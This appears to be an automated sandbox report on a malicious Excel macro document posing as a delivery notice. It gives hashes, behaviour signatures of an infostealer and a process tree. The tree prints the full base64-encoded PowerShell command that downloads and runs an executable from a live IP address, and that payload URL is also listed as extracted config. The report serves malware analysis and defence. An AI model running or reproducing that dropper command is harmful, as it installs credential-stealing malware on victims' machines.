Analysis
- max time kernel: 123s
- max time network: 149s
- platform: windows10_x64
- resource: win10-en-20211014
- submitted: 21-10-2021 05:55
- Static task: static1
- Behavioral task behavioral1: sample "delivery noticefNQSE5.xlsm", resource win7-en-20210920
- Behavioral task behavioral2: sample "delivery noticefNQSE5.xlsm", resource win10-en-20211014
General
- Target: delivery noticefNQSE5.xlsm
- Size: 389KB
- MD5: cf4c3f1e0953167d484fb25ac961db42
- SHA1: d946a7e52728e50d6013a65bc0eb008b42b83787
- SHA256: 81dc79b21940ab4d94fb07cdfc337eaf3879fc4a7ad4eb71751f3c0eaa41061b
- SHA512: d83bbff65e3d4d005b405c15708fb41967049ea7dcb059db2ea4b9b4f82a96c490088a91928f85640942ed37a7ff07e5d6391d98ad2c714bb9ab9db2a1331a8e

Malware Config
- Extracted: http://3.64.251.139/vr/r/QA4ty2uUkTCD2tfNQSE5.exe
Signatures

- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description: Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process
    pid: 2396   pid_target: 2500   process: cmd.exe   target process: EXCEL.EXE

- Blocklisted process makes network request (1 IoC)
  Processes:
    flow: 35   pid: 3796   process: powershell.exe

- Downloads MZ/PE file

- Executes dropped EXE (2 IoCs)
  Processes:
    pid: 1916   process: Qxwhhwxztatczrimdt.exe
    pid: 700    process: Qxwhhwxztatczrimdt.exe

- Deletes itself (1 IoC)
  Processes:
    pid: 2500   process: EXCEL.EXE

- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.

- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.

- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.

- Accesses Microsoft Outlook profiles (1 TTP, 3 IoCs)
  Processes (all by Qxwhhwxztatczrimdt.exe):
    Key opened: \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Key opened: \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
    Key opened: \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes:
    Set value (str) by Qxwhhwxztatczrimdt.exe: \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows\CurrentVersion\Run\note = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\office\\note.exe\""

- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Processes:
    flow: 42   ioc: checkip.dyndns.org
    flow: 45   ioc: freegeoip.app
    flow: 46   ioc: freegeoip.app

- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    description: PID 1916 set thread context of 700
    pid: 1916   process: Qxwhhwxztatczrimdt.exe   target process: Qxwhhwxztatczrimdt.exe

- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes (all by EXCEL.EXE):
    Key opened: \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString

- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes (all by EXCEL.EXE):
    Key opened: \REGISTRY\MACHINE\Hardware\Description\System\BIOS
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily
    Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU

- NTFS ADS (1 IoC)
  Processes:
    File created by EXCEL.EXE: C:\Users\Admin\AppData\Local\Temp\B5467F00\:Zone.Identifier:$DATA

- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid: 2500   process: EXCEL.EXE

- Suspicious behavior: EnumeratesProcesses (6 IoCs)
  Processes:
    pid: 3796   process: powershell.exe (3 events)
    pid: 1916   process: Qxwhhwxztatczrimdt.exe (2 events)
    pid: 700    process: Qxwhhwxztatczrimdt.exe (1 event)

- Suspicious behavior: RenamesItself (1 IoC)
  Processes:
    pid: 2500   process: EXCEL.EXE

- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
    Token: SeDebugPrivilege   pid: 3796   process: powershell.exe
    Token: SeDebugPrivilege   pid: 1916   process: Qxwhhwxztatczrimdt.exe
    Token: SeDebugPrivilege   pid: 700    process: Qxwhhwxztatczrimdt.exe

- Suspicious use of SetWindowsHookEx (13 IoCs)
  Processes:
    pid: 2500   process: EXCEL.EXE (13 events)

- Suspicious use of WriteProcessMemory (15 IoCs)
  Processes:
    PID 2500 (EXCEL.EXE) wrote to memory of 2396 (cmd.exe): 2 events
    PID 2396 (cmd.exe) wrote to memory of 3796 (powershell.exe): 2 events
    PID 3796 (powershell.exe) wrote to memory of 1916 (Qxwhhwxztatczrimdt.exe): 3 events
    PID 1916 (Qxwhhwxztatczrimdt.exe) wrote to memory of 700 (Qxwhhwxztatczrimdt.exe): 8 events

- outlook_office_path (1 IoC)
  Processes:
    Key opened by Qxwhhwxztatczrimdt.exe: \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

- outlook_win_path (1 IoC)
  Processes:
    Key opened by Qxwhhwxztatczrimdt.exe: \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Processes (process tree, indented by depth)

1. "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\delivery noticefNQSE5.xlsm"
   - Deletes itself
   - Checks processor information in registry
   - Enumerates system info in registry
   - NTFS ADS
   - Suspicious behavior: AddClipboardFormatListener
   - Suspicious behavior: RenamesItself
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

   2. C:\Windows\system32\cmd.exe /c C:\Users\Admin\Documents\Qtkkhrqfym.bat
      - Process spawned unexpected child process
      - Suspicious use of WriteProcessMemory

      3. C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -win 1 -enc JABQAHIAbwBjAE4AYQBtAGUAIAA9ACAAIgBRAHgAdwBoAGgAdwB4AHoAdABhAHQAYwB6AHIAaQBtAGQAdAAuAGUAeABlACIAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAIgBoAHQAdABwADoALwAvADMALgA2ADQALgAyADUAMQAuADEAMwA5AC8AdgByAC8AcgAvAFEAQQA0AHQAeQAyAHUAVQBrAFQAQwBEADIAdABmAE4AUQBTAEUANQAuAGUAeABlACIALAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAJABQAHIAbwBjAE4AYQBtAGUAIgApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACgAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcACQAUAByAG8AYwBOAGEAbQBlACIAKQA=
         - Blocklisted process makes network request
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of AdjustPrivilegeToken
         - Suspicious use of WriteProcessMemory

         4. "C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe"
            - Executes dropped EXE
            - Adds Run key to start application
            - Suspicious use of SetThreadContext
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory

            5. C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
               - Executes dropped EXE
               - Accesses Microsoft Outlook profiles
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of AdjustPrivilegeToken
               - outlook_office_path
               - outlook_win_path
Downloads (dropped files; duplicate entries collapsed)

- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Qxwhhwxztatczrimdt.exe.log
  MD5: 605f809fab8c19729d39d075f7ffdb53
  SHA1: c546f877c9bd53563174a90312a8337fdfc5fdd9
  SHA256: 6904d540649e76c55f99530b81be17e099184bb4cad415aa9b9b39cc3677f556
  SHA512: 82cc12c3186ae23884b8d5c104638c8206272c4389ade56b926dfc1d437b03888159b3c790b188b54d277a262e731927e703e680ea642e1417faee27443fd5b3

- C:\Users\Admin\AppData\Local\Temp\Qxwhhwxztatczrimdt.exe
  MD5: 1eada844f6d267f4451b9ffa8eba6624
  SHA1: 11144faece06eb2b3c9c7e19ac3c170b66a351f7
  SHA256: 49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e
  SHA512: 1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

- C:\Users\Admin\AppData\Roaming\Qxwhhwxztatczrimdt.exe
  MD5: 1eada844f6d267f4451b9ffa8eba6624
  SHA1: 11144faece06eb2b3c9c7e19ac3c170b66a351f7
  SHA256: 49e595816d745be34ae53202b5839e72a30d7245321003fe7a37e1d99508695e
  SHA512: 1ae7d108ea5e92b4959de64702710d8f9941bff341c3d389d5cf54f1eec1d54697de9eee5d65c0e23f9be34700bde582d2b77577fb3ee811a2c7cf950dd9d726

- C:\Users\Admin\Documents\Qtkkhrqfym.bat
  MD5: 57cc9b0d215088ba8b5d63024605da81
  SHA1: cdc02772f2d7ecacbb86ad63e67b1726b36eafc6
  SHA256: ea7db683263f7447dec974e52fe719b6ed0db751e122d53f57cdd0482d644f70
  SHA512: bc087ab0e497686213f9a2a03a447009a798936ee8d80d4f652edf8974e0940a20445db82802581acf3b7865c8a00013173f55db365daf2aa31c28bd43bf04e3